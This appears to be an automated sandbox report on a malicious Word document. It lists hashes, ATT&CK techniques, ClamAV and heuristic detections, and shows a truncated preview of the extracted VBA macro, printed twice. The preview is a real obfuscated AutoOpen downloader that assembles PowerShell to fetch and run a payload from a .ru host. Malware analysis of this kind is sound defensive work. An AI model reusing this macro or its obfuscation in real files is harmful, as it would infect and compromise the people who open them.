Office (OLE) malware analysis — malicious · a8c75f9b1e601c4c

MALICIOUS

Office (OLE)

305.5 KB Created: 2018-01-04 09:14:00 Authoring application: Microsoft Office Word First seen: 2018-01-08

MD5: f79b50bfff9d65937b2c60a1b037be8e SHA-1: f3b98f974e8f9c1591a773681a7a78a0d80e65af SHA-256: a8c75f9b1e601c4c77b67ddd1bdb28bf9164c4f507b9530fa31861f2c72fb2d7

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The file contains a VBA macro with an AutoOpen function that executes a Shell() command. This script attempts to download a payload from the reconstructed URL 'http://naruto-grand3Dk+3w1W+w1WDk.ru/53Dk+3DkjO3Dk+3DkO3Dk+3Dk4X/'. The presence of the Shell() call and the obfuscated download URL strongly indicate a malicious downloader. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' further supports this assessment.

Heuristics 7

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://naruto-grand3Dk+3w In document text (OLE body)
- http://www.mednIn document text (OLE body)
- http://3Dk+3DkwwIYN8zQ58ZnzSAZt1wpDst1W0BzR0zvHIn document text (OLE body)
- http://3Dk+3Dw1W+In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 116160 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	116160 bytes
SHA-256: `93daf3a0463d6222a3877970ffddd89b92ce0ebbaa7923263850e6b02cf86310`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "DkmcsmWdCGmCTQ" Function MKwmUuzCXJj() On Error Resume Next jahHbnzl = 90 / Sqr(5) + famMndsQuCo / CBool(wzZoTTZGt * Sin(461)) * (6739 - 4 / (VwztbvXvCkdo * pALqwwnjcai + XDHFJsT - ChrB(3))) + 90 / Sqr(5) + wFnPtBzswADn / CBool(TjnHcaHG * Sin(461)) * (6739 - 4 / (tYPrErQqtrJEjk * wwwBvkbW + sDUTwjRLdBMPAB - ChrB(3))) DdwJZC = 90 / Sqr(5) + RXsJIYBmLwLNh / CBool(YIEGkCNS * Sin(461)) * (6739 - 4 / (KhqpmEUcu * sljLEIm + NFSQiSVRZSYbq - ChrB(3))) + 90 / Sqr(5) + zIhcRjPhqUQ / CBool(parwAwzK * Sin(461)) * (6739 - 4 / (NvtzYTV * CDSLQmYdbrD + fOwAXcvZcRa - ChrB(3))) JRQAEwfd = DEDNQLuzRPbv + Mid("5YIdF8m-ob3Dk'+'+3Dkjw1W+w1Wect rando3Dk+3Dkmw1W+w1W;b3Tb3w1W+w1WDk+3Dkcd = n70http://naruto-grand3Dk+3w'+'1'+'W+w1WDk.ru/53Dk+3D'+'k'+'R3Dk+3DkjO3Dk+3DkO3Dk+3'+'Dk4X/,http://3Dk+3'+Rw84C2icM2Ji", 8, 175) + iphXfMt PDdVuu = 90 / Sqr(5) + FbIHMdFnwbLfdG / CBool(MRBUzAXz * Sin(461)) * (6739 - 4 / (MZwafYwwvAwUc * KRmQWsmAnF + ovOfCvhiQ - ChrB(3))) + 90 / Sqr(5) + mffHafOkdJqjwr / CBool(MkBFFLl * Sin(461)) * (6739 - 4 / (HrdiQsEOpMZXm * IwMXPKvc + wWcpLjZ - ChrB(3))) hkCpntrNIS = 90 / Sqr(5) + IjiCnRQz / CBool(TEiPfjqOOHohj * Sin(461)) * (6739 - 4 / (IiaslfdEXANPXV * rhphcFsJZJbUfv + sZbmWXMYfTOPhh - ChrB(3))) + 90 / Sqr(5) + PJVTXZw / CBool(EsQUAjKKzIaHon * Sin(461)) * (6739 - 4 / (zXiIKNOpLbXt * zLYXtZXtG + LpUJQGH - ChrB(3))) nECiZzFFFcb = 90 / Sqr(5) + wimiLoDshQB / CBool(XzjszQZXkBbhb * Sin(461)) * (6739 - 4 / (Ljjbjdn * ptdRkKohNk + hwQWjFbHYr - ChrB(3))) + 90 / Sqr(5) + CFDJcUIFjYCwKp / CBool(hfPjDnrLt * Sin(461)) * (6739 - 4 / (uNAWEWP * tqXObhUYHAzi + GjUYwrooHLuKEh - ChrB(3))) inukA = jAmYQwww + Mid("oBG+w1W3Dk+3Dk;bw1W+w1W3Tkar3Dk+3Dka3Dk+3Dk'+'pas3Dk+3Dk = b3Tns3Dk+3w1W+w1WDkada3Dk+3Dksd.n3Dk+3Dkex3DkETIs4RnEVGCpnpwhcoM7nVh", 4, 101) + ZuAXXUQFbFshv ANQRtSi = 90 / Sqr(5) + NbYWvsRomq / CBool(EsdptLl * Sin(461)) * (6739 - 4 / (CNOQrsVTTqEz * ECKSsdQfFFnh + BJizbwiVEMzLh - ChrB(3))) + 90 / Sqr(5) + aZzwisTAqTX / CBool(hVEwIai * Sin(461)) * (6739 - 4 / (rLkTOFT * ApKGLApGI + FpXBSPcb - ChrB(3))) uwudhX = 90 / Sqr(5) + kjHZfMVthwPQC / CBool(YMjnJXdCXsPkN * Sin(461)) * (6739 - 4 / (XGunzsiVuz * jDjXbZwqii + CwDjNiI - ChrB(3))) + 90 / Sqr(5) + JvzvVbBcT / CBool(GDSkQZTt * Sin(461)) * (6739 - 4 / (wSRujqREwjN * AMfpbkHOwZz + fXfoRiiQTDM - ChrB(3))) fVFZpJ = 90 / Sqr(5) + AUsdqsUrnoLzt / CBool(ldfOZRiXdRRA * Sin(461)) * (6739 - 4 / (HMmjbSSDE * CvWUmwnNIHPX + JTHjKdrbMpbN - ChrB(3))) + 90 / Sqr(5) + AFjiaijtcSC / CBool(rbpDJtCkZdQUlH * Sin(461)) * (6739 - 4 / (NIqFvGHviid * hqsjAEiSBBYC + YdFXpOtTHSlmNG - ChrB(3))) DhEsfFkI = IQHEZcjlP + Mid("zmDdhOIpTd9ODw1W+w1Wk+3Dkpt'+'ion.Message;3Dk+w1W+w1W3Dk}}3Dk).rePlaCE(3Dkb3T3Dkw1W+w1W,3Dkvmn3Dk).reP'+'laCE(([cHARw1W+w1W]110+[cHAR]55+[cHAR'+']48),[s3NsJ", 13, 140) + djcYFABIQohjw AzkLE = 90 / Sqr(5) + sBPFEWFsFjGqnv / CBool(oLfhWVmPLKdmN * Sin(461)) * (6739 - 4 / (wKwAjza * CJZTFZwRoB + tqEoWpaFlD - ChrB(3))) + 90 / Sqr(5) + bkrnIVKpDzNSJV / CBool(DQMQuVcP * Sin(461)) * (6739 - 4 / (PrWZLIroRH * pbRQdHzzYfXv + OmKsVJYwV - ChrB(3))) pOLvLz = 90 / Sqr(5) + nICsRVSnWPhs / CBool(wRZiCIhjYkT * Sin(461)) * (6739 - 4 / (NSoWvDi * onplPiFnMV + TSqUsSjENYGPX - ChrB(3))) + 90 / Sqr(5) + pEDdQbLDUnLc / CBool(PUDtTCuzkWwvE * Sin(461)) * (6739 - 4 / (zRziYRCZd * JwuiPzD + QiQkJimN - ChrB(3))) AZpfmi = 90 / Sqr(5) + YwwTIijU / CBool(tzfXUCS * Sin(461)) * (6739 - 4 / (VtiwLMw * VCTijjUtZFwI + sSDwXFw - ChrB(3))) + 90 / Sqr(5) + QCcYhVCa / CBool(NlBkmjPqU * Sin(461)) * (6739 - 4 / (flwOFJAd * bzoHzbFArFB + STKsKGWF - ChrB(3))) jzjzpqDPzGR = YQwkiuGZBB + Mid("K+3Dkt(1'+', 3Dk+3Dk343Dk+3Dk3245);b3T3Dk+3Dkhua3Dk+3Dks = b3Dk+3Dk3Tenv3Dk+3Dk:publi'+'c +3Dk+3Dk n70P3Dk+3Dk6T3Dk+3Dkn70 + b3Tkarapas + nw1W+dKTaWAc0V98CIz", 2, 142) + SbwwmnWiqorwE Fjtcwh = 90 / Sqr(5) + jFiFiMMMmUE / CBool(KlqqB ... (truncated)

SHA-256: 93daf3a0463d6222a3877970ffddd89b92ce0ebbaa7923263850e6b02cf86310

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "DkmcsmWdCGmCTQ"
Function MKwmUuzCXJj()
On Error Resume Next
jahHbnzl = 90 / Sqr(5) + famMndsQuCo / CBool(wzZoTTZGt * Sin(461)) * (6739 - 4 / (VwztbvXvCkdo * pALqwwnjcai + XDHFJsT - ChrB(3))) + 90 / Sqr(5) + wFnPtBzswADn / CBool(TjnHcaHG * Sin(461)) * (6739 - 4 / (tYPrErQqtrJEjk * wwwBvkbW + sDUTwjRLdBMPAB - ChrB(3)))
DdwJZC = 90 / Sqr(5) + RXsJIYBmLwLNh / CBool(YIEGkCNS * Sin(461)) * (6739 - 4 / (KhqpmEUcu * sljLEIm + NFSQiSVRZSYbq - ChrB(3))) + 90 / Sqr(5) + zIhcRjPhqUQ / CBool(parwAwzK * Sin(461)) * (6739 - 4 / (NvtzYTV * CDSLQmYdbrD + fOwAXcvZcRa - ChrB(3)))
JRQAEwfd = DEDNQLuzRPbv + Mid("5YIdF8m-ob3Dk'+'+3Dkjw1W+w1Wect rando3Dk+3Dkmw1W+w1W;b3Tb3w1W+w1WDk+3Dkcd = n70http://naruto-grand3Dk+3w'+'1'+'W+w1WDk.ru/53Dk+3D'+'k'+'R3Dk+3DkjO3Dk+3DkO3Dk+3'+'Dk4X/,http://3Dk+3'+Rw84C2icM2Ji", 8, 175) + iphXfMt
PDdVuu = 90 / Sqr(5) + FbIHMdFnwbLfdG / CBool(MRBUzAXz * Sin(461)) * (6739 - 4 / (MZwafYwwvAwUc * KRmQWsmAnF + ovOfCvhiQ - ChrB(3))) + 90 / Sqr(5) + mffHafOkdJqjwr / CBool(MkBFFLl * Sin(461)) * (6739 - 4 / (HrdiQsEOpMZXm * IwMXPKvc + wWcpLjZ - ChrB(3)))
hkCpntrNIS = 90 / Sqr(5) + IjiCnRQz / CBool(TEiPfjqOOHohj * Sin(461)) * (6739 - 4 / (IiaslfdEXANPXV * rhphcFsJZJbUfv + sZbmWXMYfTOPhh - ChrB(3))) + 90 / Sqr(5) + PJVTXZw / CBool(EsQUAjKKzIaHon * Sin(461)) * (6739 - 4 / (zXiIKNOpLbXt * zLYXtZXtG + LpUJQGH - ChrB(3)))
nECiZzFFFcb = 90 / Sqr(5) + wimiLoDshQB / CBool(XzjszQZXkBbhb * Sin(461)) * (6739 - 4 / (Ljjbjdn * ptdRkKohNk + hwQWjFbHYr - ChrB(3))) + 90 / Sqr(5) + CFDJcUIFjYCwKp / CBool(hfPjDnrLt * Sin(461)) * (6739 - 4 / (uNAWEWP * tqXObhUYHAzi + GjUYwrooHLuKEh - ChrB(3)))
inukA = jAmYQwww + Mid("oBG+w1W3Dk+3Dk;bw1W+w1W3Tkar3Dk+3Dka3Dk+3Dk'+'pas3Dk+3Dk = b3Tns3Dk+3w1W+w1WDkada3Dk+3Dksd.n3Dk+3Dkex3DkETIs4RnEVGCpnpwhcoM7nVh", 4, 101) + ZuAXXUQFbFshv
ANQRtSi = 90 / Sqr(5) + NbYWvsRomq / CBool(EsdptLl * Sin(461)) * (6739 - 4 / (CNOQrsVTTqEz * ECKSsdQfFFnh + BJizbwiVEMzLh - ChrB(3))) + 90 / Sqr(5) + aZzwisTAqTX / CBool(hVEwIai * Sin(461)) * (6739 - 4 / (rLkTOFT * ApKGLApGI + FpXBSPcb - ChrB(3)))
uwudhX = 90 / Sqr(5) + kjHZfMVthwPQC / CBool(YMjnJXdCXsPkN * Sin(461)) * (6739 - 4 / (XGunzsiVuz * jDjXbZwqii + CwDjNiI - ChrB(3))) + 90 / Sqr(5) + JvzvVbBcT / CBool(GDSkQZTt * Sin(461)) * (6739 - 4 / (wSRujqREwjN * AMfpbkHOwZz + fXfoRiiQTDM - ChrB(3)))
fVFZpJ = 90 / Sqr(5) + AUsdqsUrnoLzt / CBool(ldfOZRiXdRRA * Sin(461)) * (6739 - 4 / (HMmjbSSDE * CvWUmwnNIHPX + JTHjKdrbMpbN - ChrB(3))) + 90 / Sqr(5) + AFjiaijtcSC / CBool(rbpDJtCkZdQUlH * Sin(461)) * (6739 - 4 / (NIqFvGHviid * hqsjAEiSBBYC + YdFXpOtTHSlmNG - ChrB(3)))
DhEsfFkI = IQHEZcjlP + Mid("zmDdhOIpTd9ODw1W+w1Wk+3Dkpt'+'ion.Message;3Dk+w1W+w1W3Dk}}3Dk).rePlaCE(3Dkb3T3Dkw1W+w1W,3Dkvmn3Dk).reP'+'laCE(([cHARw1W+w1W]110+[cHAR]55+[cHAR'+']48),[s3NsJ", 13, 140) + djcYFABIQohjw
AzkLE = 90 / Sqr(5) + sBPFEWFsFjGqnv / CBool(oLfhWVmPLKdmN * Sin(461)) * (6739 - 4 / (wKwAjza * CJZTFZwRoB + tqEoWpaFlD - ChrB(3))) + 90 / Sqr(5) + bkrnIVKpDzNSJV / CBool(DQMQuVcP * Sin(461)) * (6739 - 4 / (PrWZLIroRH * pbRQdHzzYfXv + OmKsVJYwV - ChrB(3)))
pOLvLz = 90 / Sqr(5) + nICsRVSnWPhs / CBool(wRZiCIhjYkT * Sin(461)) * (6739 - 4 / (NSoWvDi * onplPiFnMV + TSqUsSjENYGPX - ChrB(3))) + 90 / Sqr(5) + pEDdQbLDUnLc / CBool(PUDtTCuzkWwvE * Sin(461)) * (6739 - 4 / (zRziYRCZd * JwuiPzD + QiQkJimN - ChrB(3)))
AZpfmi = 90 / Sqr(5) + YwwTIijU / CBool(tzfXUCS * Sin(461)) * (6739 - 4 / (VtiwLMw * VCTijjUtZFwI + sSDwXFw - ChrB(3))) + 90 / Sqr(5) + QCcYhVCa / CBool(NlBkmjPqU * Sin(461)) * (6739 - 4 / (flwOFJAd * bzoHzbFArFB + STKsKGWF - ChrB(3)))
jzjzpqDPzGR = YQwkiuGZBB + Mid("K+3Dkt(1'+', 3Dk+3Dk343Dk+3Dk3245);b3T3Dk+3Dkhua3Dk+3Dks = b3Dk+3Dk3Tenv3Dk+3Dk:publi'+'c +3Dk+3Dk n70P3Dk+3Dk6T3Dk+3Dkn70 + b3Tkarapas + nw1W+dKTaWAc0V98CIz", 2, 142) + SbwwmnWiqorwE
Fjtcwh = 90 / Sqr(5) + jFiFiMMMmUE / CBool(KlqqB
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.